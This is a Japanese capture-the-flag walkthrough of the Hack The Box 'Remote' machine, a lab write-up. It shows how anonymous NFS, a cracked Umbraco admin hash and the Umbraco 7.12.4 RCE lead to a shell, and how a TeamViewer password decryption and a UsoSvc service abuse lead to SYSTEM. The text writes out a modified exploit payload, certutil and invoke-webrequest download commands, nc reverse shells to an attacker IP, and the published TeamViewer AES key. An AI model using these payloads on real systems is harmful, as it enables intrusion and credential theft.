【HackTheBox】Remote - Walkthrough -

本稿では、Hack The Boxにて提供されている Retired Machines の「Remote」に関する攻略方法（Walkthrough）について検証します。

Hack The Boxに関する詳細は、「Hack The Boxを楽しむためのKali Linuxチューニング」を併せてご確認ください。

マシンの詳細

エグゼクティブサマリー

ツール

• nmap
• nfs-common
• showmount
• Hash ToolKit
• PowerShell
• invoke-webrequest
• winPEASx64
• Get-ItemProperty
• Get-ItemPropertyValue
• CyberChef
• Evil-WinRM

詳細手順

ネットワークサービススキャン

nmap

IPアドレス 10.10.10.180 を remote.htb として、 /etc/hosts に追加します。その上で、nmapを使用し、ポートスキャンを実行します。

kali@kali:~$ nmap -Pn -T4 -A -v remote.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-17 02:13 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 02:13
Completed NSE at 02:13, 0.00s elapsed
Initiating NSE at 02:13
Completed NSE at 02:13, 0.00s elapsed
Initiating NSE at 02:13
Completed NSE at 02:13, 0.00s elapsed
Initiating Connect Scan at 02:13
Scanning remote.htb (10.10.10.180) [1000 ports]
Discovered open port 139/tcp on 10.10.10.180
Discovered open port 111/tcp on 10.10.10.180
Discovered open port 135/tcp on 10.10.10.180
Discovered open port 445/tcp on 10.10.10.180
Discovered open port 80/tcp on 10.10.10.180
Increasing send delay for 10.10.10.180 from 0 to 5 due to 13 out of 31 dropped probes since last increase.
Discovered open port 21/tcp on 10.10.10.180
Increasing send delay for 10.10.10.180 from 5 to 10 due to max_successful_tryno increase to 5
Discovered open port 2049/tcp on 10.10.10.180
Warning: 10.10.10.180 giving up on port because retransmission cap hit (6).
Completed Connect Scan at 02:14, 54.64s elapsed (1000 total ports)
Initiating Service scan at 02:14
Scanning 7 services on remote.htb (10.10.10.180)
Completed Service scan at 02:15, 60.81s elapsed (7 services on 1 host)
NSE: Script scanning 10.10.10.180.
Initiating NSE at 02:15
NSE: [ftp-bounce] PORT response: 501 Server cannot accept argument.
Completed NSE at 02:15, 9.83s elapsed
Initiating NSE at 02:15
Completed NSE at 02:18, 170.50s elapsed
Initiating NSE at 02:18
Completed NSE at 02:18, 0.00s elapsed
Nmap scan report for remote.htb (10.10.10.180)
Host is up (0.19s latency).
Not shown: 990 closed ports
PORT     STATE    SERVICE       VERSION
21/tcp   open     ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home - Acme Widgets
111/tcp  open     rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open     msrpc         Microsoft Windows RPC
139/tcp  open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open     microsoft-ds?
720/tcp  filtered unknown
1148/tcp filtered elfiq-repl
2049/tcp open     mountd        1-3 (RPC #100005)
9011/tcp filtered d-star
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 1m41s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-08-17T06:17:09
|_  start_date: N/A

NSE: Script Post-scanning.
Initiating NSE at 02:18
Completed NSE at 02:18, 0.00s elapsed
Initiating NSE at 02:18
Completed NSE at 02:18, 0.00s elapsed
Initiating NSE at 02:18
Completed NSE at 02:18, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 296.69 seconds

これで、標的にて稼働しているサービスが判明しました。特に気になるのは次の通りです。

ポート番号	サービス	バージョン
21/tcp	ftp	Microsoft ftpd
80/tcp	http	Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
445/tcp	microsoft-ds?
2049/tcp	mountd	1-3 (RPC #100005)

NFSサービスのスキャン

kali@kali:~$ sudo apt install nfs-common

showmountコマンドにて、/site_backupsディレクトリをローカルマシンにマウントできることが解りました。

kali@kali:~$ sudo showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)

/site_backupsディレクトリをローカルマシンの/mntディレクトリにマウントします。

kali@kali:~$ sudo mount -t nfs remote.htb:/site_backups /mnt

Web.configの内容を確認します。結果、このサイトで使用されているCMSが「Umbraco CMS 7.12.4」であることが特定できました。

Firefoxでhttp://10.10.10.180/umbracoへアクセスします。UsernameとPasswordの組について標準的なアカウントで試行しましたが、ログインに失敗しました。

再び、/site_backupsディレクトリを探索します。データベースファイルであるUmbraco.sdfの内容が気になります。
adminのSHA1ハッシュ値を取得することができました。

kali@kali:/mnt/App_Data$ ls
cache  Logs  Models  packages  TEMP  umbraco.config  Umbraco.sdf
kali@kali:/mnt/Appstrings Umbraco.sdf | grep admin
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f

「Hash ToolKit」のサイトでSHA1ハッシュ値「b8be16afba8c314ad33d812f22a04991b90e2aaa」の値を Decrypt します。
結果、次のとおりでした。

アルゴリズム	ハッシュ値	Decrypted
SHA1	b8be16afba8c314ad33d812f22a04991b90e2aaa	baconandcheese

再び、Firefoxでhttp://10.10.10.180/umbracoへアクセスします。ユーザー名をadmin@htb.local、パスワードをbaconandcheeseを指定します。ログインに成功しました。

左側ペインの[Media]項目から任意のファイルをアップロードすることが可能です。

アクセス権の取得

Umbraco CMS 7.12.4には、リモートコード実行の脆弱性（EDB-ID：46153）を抱えていることが知られています。

• EDB-ID:46153 Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution

この脆弱性を悪用し、リバースシェルを確立する方法を検討します。

ペイロードの作成

オリジナルの46153.pyにおけるペイロードは、CALC.EXEコマンドが起動するのみです。
そこで、/c certutil -urlcache -split -f http://10.10.14.13:8081/nc.exe c:/windows/temp/nc.exeコマンド構文を実行し、nc.exeをremote.htb上にダウンロードします。

46153.py

payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "/c certutil -urlcache -split -f http://10.10.14.18:8081/nc64.exe c:/windows/temp/nc64.exe"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "cmd.exe"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> ';

login = "admin@htb.local";
password="baconandcheese";
host = "http://10.10.10.180";

ユーザーシェルの取得

remote.htbにダウンロードしたnc64.exeを起動し、リバースシェルを確立します。

Kali Linux上でリバースシェルを立ち上げておきます。

kali@kali:~$ nc -lnvp 4444
listening on [any] 4444 ...

46153.pyコードを改変し、remote.htbのnc64.exeを起動します。

46153_r2.py

{ string cmd = "/c c:/windows/temp/nc64.exe 10.10.14.18 4444 -e cmd.exe";

46153_r2.pyコードを実行し、リバースシェルを確立します。

kali@kali:~$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.180] 49705
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

リバースシェルにより、iis apppool\defaultapppool権限のシェルが確立されています。

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

userフラグの取得

user.txtフラグを取得します。

c:\windows\system32\inetsrv>type c:\Users\Public\user.txt
type c:\Users\Public\user.txt
f87c{BLOCKED}4a84

特権昇格

システム探索

WinPEAS

「WinPEAS - Windows Privilege Escalation Awesome Scripts」ツールを使ってシステム探索を行います。

c:\Users\Public>powershell
powershell
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Public> invoke-webrequest -uri http://10.10.14.18:8081/winPEASx64.exe -outfile wp.exe
invoke-webrequest -uri http://10.10.14.18:8081/winPEASx64.exe -outfile wp.exe
PS C:\Users\Public> exit
exit

c:\Users\Public>wp.exe

Services Information項目として、TeamViewer7が列挙されました。

    TeamViewer7(TeamViewer GmbH - TeamViewer 7)["C:\Program Files (x86)\TeamViewer\Version7\TeamViewer_Service.exe"] - Auto - Running
    TeamViewer Remote Software

PowerUp.ps1

「PowerUp.ps1」スクリプトを使ってシステム探索を行います。

PS C:\tmp> Import-Module c:\tmp\powerup.ps1
PS C:\tmp> .\powerup.ps1
PS C:\tmp> Invoke-AllChecks

Import-Module実行の際には、フルパスにてスクリプトの場所を指定してください。

[*] Checking service permissions...項目に注目します。
SYSTEM特権で実行されているUsoSvc（Update Orchestrator Service）の変更が可能であることに着目してください。

[*] Checking service permissions...


ServiceName   : UsoSvc
Path          : C:\Windows\system32\svchost.exe -k netsvcs -p
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart    : True

TeamViewerパスワードの復号

TeamViewerでは、パスワードがAES-128-CBCアルゴリズムによって暗号化された形式でWindowsレジストリに保存されていることが知られています。
また、その秘密鍵と初期化ベクトル（IV：initialization vector）は（CVE-2019-18988）にて明らかにされています。
すなわち、レジストリに記録されている値をもとに、パスワードを復号できる可能性があります。

種別	値
秘密鍵	0602000000a400005253413100040000
初期化ベクトル（IV）	0100010067244F436E6762F25EA8D704

そこで、PowerShellのGet-ItemPropertyコマンドレット使い、HKLM:SOFTWARE\WOW6432Node\TeamViewer\Version7プロパティの値を取得してみます。

c:\>powershell
powershell
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\> Get-ItemProperty -Path HKLM:SOFTWARE\WOW6432Node\TeamViewer\Version7
Get-ItemProperty -Path HKLM:SOFTWARE\WOW6432Node\TeamViewer\Version7


StartMenuGroup            : TeamViewer 7
InstallationDate          : 2020-02-20
InstallationDirectory     : C:\Program Files (x86)\TeamViewer\Version7
Always_Online             : 1
Security_ActivateDirectIn : 0
Version                   : 7.0.43148
ClientIC                  : 301094961
PK                        : {191, 173, 42, 237...}
SK                        : {248, 35, 152, 56...}
LastMACUsed               : {, 005056B9B73A}
MIDInitiativeGUID         : {514ed376-a4ee-4507-a28b-484604ed0ba0}
MIDVersion                : 1
ClientID                  : 1769137322
CUse                      : 1
LastUpdateCheck           : 1584564540
UsageEnvironmentBackup    : 1
SecurityPasswordAES       : {255, 155, 28, 115...}
MultiPwdMgmtIDs           : {admin}
MultiPwdMgmtPWDs          : {357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77}
Security_PasswordStrength : 3
PSPath                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Vers
                            ion7
PSParentPath              : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer
PSChildName               : Version7
PSDrive                   : HKLM
PSProvider                : Microsoft.PowerShell.Core\Registry

さらに、Get-ItemPropertyValueコマンドレットにて、HKLM:SOFTWARE\WOW6432Node\TeamViewer\Version7の値であるSecurityPasswordAESのデータを表示させます。

PS C:\> Get-ItemPropertyValue -LiteralPath 'HKLM:SOFTWARE\WOW6432Node\TeamViewer\Version7' -Name SecurityPasswordAES
Get-ItemPropertyValue -LiteralPath 'HKLM:SOFTWARE\WOW6432Node\TeamViewer\Version7' -Name SecurityPasswordAES
255
155
28
115
214
107
206
49
172
65
62
174
19
27
70
79
88
47
108
226
209
225
243
218
126
141
55
107
38
57
78
91

SecurityPasswordAESの値を取得することができました。

CyberChef

CyberChefを使い、SecurityPasswordAESの値からTeamViewerのパスワードの復号を試みます。

「区切り文字（delimiter）」を「改行コード（\n）」から「スペース記号」に置き換え見通しよくします。

255 155 28 115 214 107 206 49 172 65 62 174 19 27 70 79 88 47 108 226 209 225 243 218 126 141 55 107 38 57 78 91

10進数から16進数表記に変換します。

ff 9b 1c 73 d6 6b ce 31 ac 41 3e ae 13 1b 46 4f 58 2f 6c e2 d1 e1 f3 da 7e 8d 37 6b 26 39 4e 5b

スペース記号を取り除きます。

ff9b1c73d66bce31ac413eae131b464f582f6ce2d1e1f3da7e8d376b26394e5b

16進数表記に変換したSecurityPasswordAESの値を復号します。

TeamViewerの[Key, 秘密鍵]と[IV, 初期化ベクトル]を指定した TeamViewer Decryptレシピを使います。

TeamViewer_Decrypt.json

[
  { "op": "AES Decrypt",
    "args": [{ "option": "Hex", "string": "0602000000a400005253413100040000" }, { "option": "Hex", "string": "0100010067244F436E6762F25EA8D704" }, "CBC", "Hex", "Raw", { "option": "Hex", "string": "" }] }
]

TeamViewerのパスワードが!R3m0te!であることが特定できました。

!.R.3.m.0.t.e.!.................

特権シェルの取得

Evil-WinRMシェル

nmapコマンドにて、WinRMサービス（5985/tcp）の状況を確認します。結果、サービスが稼働していることが確認できます。

kali@kali:~$ nmap -p 5985 -A remote.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-05 06:03 EDT
Nmap scan report for remote.htb (10.10.10.180)
Host is up (0.091s latency).

PORT     STATE SERVICE VERSION
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.24 seconds

そこで、Evil-WinRMツールを介して、remote.htbサーバーで稼働しているWinRMサービスに接続し、インタラクティブなPowerShellを確立します。

Evil-WinRMツールとシステムの依存関係を解決し、リポジトリのクローンを作成します。

kali@kali:~$ sudo gem install winrm winrm-fs colorize stringio
kali@kali:~$ git clone https://github.com/Hackplayers/evil-winrm.git

remote.htbに対するリモートシェルの確立を行います。

ユーザー名	パスワード
Administrator	!R3m0te!

kali@kali:~$ cd evil-winrm && ruby evil-winrm.rb -i 10.10.10.180 -u Administrator -p '!R3m0te!'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
remote\administrator

UsoSvcサービスの再構成

別の方法でSYSTEM特権のリバースシェルを確立することを検討します。

ここでは、UsoSvcサービスを再構成します。nc64.exeを起動しSYSTEM特権のリバースシェルを確立することが狙いです。

PS C:\tmp> Invoke-ServiceAbuse -ServiceName 'UsoSvc' -Command 'C:\Windows\temp\ｎc64.exe  -e cmd.exe 10.10.14.18 4444'

ServiceAbused Command                                               
------------- -------
UsoSvc        C:\Windows\temp\nc64.exe  -e cmd.exe 10.10.14.18 4444

kali@kali:~$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.180] 49705
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

rootフラグの取得

root.txtフラグを取得します。

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         9/4/2020   1:15 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
b642{BLOCKED}0384

参考情報

PowerUp.ps1

• harmj0y 「PowerUp: A Usage Guide」, 2014/06/18

TeamViewer

• AttackerKB 「CVE-2019-18988」, 2020/02/07
• WhyNotSecurity 「TeamViewer」, 2020/02/02
• 「AES decode with Cyberchef 」, 2018/03/20
• IT solutions that work 「Reset TeamViewer Host password remotely」, 2015/03/06

CyberChef

• Shota Shinogi 「CyberChefの使い方（HamaCTF2019 WriteUp編」, 2019/08/19
• TSALVIA技術メモ 「CyberChef で Emotet ダウンローダを読んでみた」, 2020/03/05
• Jonathan Glass 「Cybersecurity Zero to Hero with CyberChef」(PDFファイル)
• RVAsec 2019, Jonathan Glass 「Cybersecurity Zero to Hero with CyberChef」（YouTube）, 2019/12/19

Walkthrough

• IppSec 「HackTheBox - Remote」, 2020/09/06
• Snowscan 「Remote - Hack The Box」, 2020/09/06
• 0xdf hacks stuff 「HTB: Remote」, 2020/09/06